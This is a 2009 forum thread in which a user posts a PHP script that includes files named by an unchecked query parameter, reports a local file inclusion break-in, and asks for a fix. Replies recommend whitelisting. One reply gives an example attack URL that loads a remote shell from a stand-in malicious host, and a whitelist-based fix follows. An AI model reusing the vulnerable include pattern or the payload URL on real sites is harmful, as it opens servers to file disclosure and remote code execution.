Help needed to correct a simple PHP script!


dan113
Apr 26th 2009, 7:15 am
<?php
$nav = 'people';
include 'navigation/htmlhead.php';
?>

<body>

<div id="wrap">

<?php
// add a line to check for allowed $nav values.

include 'navigation/header.php';
include 'navigation/nav.php';

if (!isset($_GET['main'])) {
    $main = 'default';
} else {
    // Taken straight from the query string, with no validation.
    $main = $_GET['main'];
}

include ($nav.'/sidebar.php');
// $main is used unchecked to build the include path.
include ($nav.'/'.$main.'.php');
$filename = $nav.'/'.$main.'.php';

include 'navigation/footer.php';
?>

</div>

</body>
</html>


This is the code. It seems someone actually entered my server with Local File Inclusion and was able to upload some files to my server without my permission. What should I change in this code so that people won't be able to see my /etc/passwd file? Actually, they can see it!
Thanks a lot.
Whoever helps me, I pay $10 via PayPal.

mfscripts
Apr 26th 2009, 7:20 am
I'm not sure this resolves your problem, but you'll need to check for allowed values for $main, since any value could be passed by the user within $_GET['main'], e.g. main=../admin/admin_script.html or similar, which may cause security issues.

dan113
Apr 26th 2009, 7:27 am
I don't get you... I'm not good with PHP.

Spawny
Apr 26th 2009, 7:39 am
Try using a separate if statement for the values allowed in your $_GET['main']. Yours is like: if the $_GET['main'] value isn't specified, accept anything. I can execute a remote script with your code.

eg. http://victim.com/index.php?main=http://www.malicious.com/shell.php?
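The whitelist check that both replies describe, as an added example that is not code from the thread: $main is only ever compared against a fixed list of page names, and the resolved path is confirmed to sit under the section directory before it is included. The section and page names in $allowedPages are assumptions for illustration.

```php
<?php
// Added example, not the original poster's code. $nav is set per page as before.
$nav = 'people';

// Allowed page names for each section (assumed names). Anything not listed is rejected.
$allowedPages = [
    'people'   => ['default', 'staff', 'contact'],
    'projects' => ['default', 'list'],
];

// Returns a page name that is guaranteed to be one of the listed values.
function resolvePage(array $allowedPages, string $nav, ?string $requested): string
{
    // Unknown section: refuse rather than build a path from it.
    if (!isset($allowedPages[$nav])) {
        throw new RuntimeException('Unknown section');
    }
    $main = $requested ?? 'default';
    // Strict comparison against the list: "../", "http://" or a null byte can never
    // match, because the value has to equal one of the listed names exactly.
    if (!in_array($main, $allowedPages[$nav], true)) {
        $main = 'default';
    }
    return $main;
}

$main = resolvePage($allowedPages, $nav, isset($_GET['main']) ? (string) $_GET['main'] : null);

// Second check: the final path must resolve to a real file inside the section directory.
$base = realpath(__DIR__ . '/' . $nav);
$file = realpath($base . '/' . $main . '.php');
if ($base === false || $file === false || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
    http_response_code(404);
    exit('Page not found');
}

include 'navigation/htmlhead.php';
include 'navigation/header.php';
include 'navigation/nav.php';
include $nav . '/sidebar.php';
include $file;          // only ever a whitelisted file under $nav
include 'navigation/footer.php';
```

Alongside the whitelist, setting allow_url_include=Off in php.ini stops include() from fetching remote URLs at all, which removes the remote-script case Spawny describes even if a check is missed elsewhere.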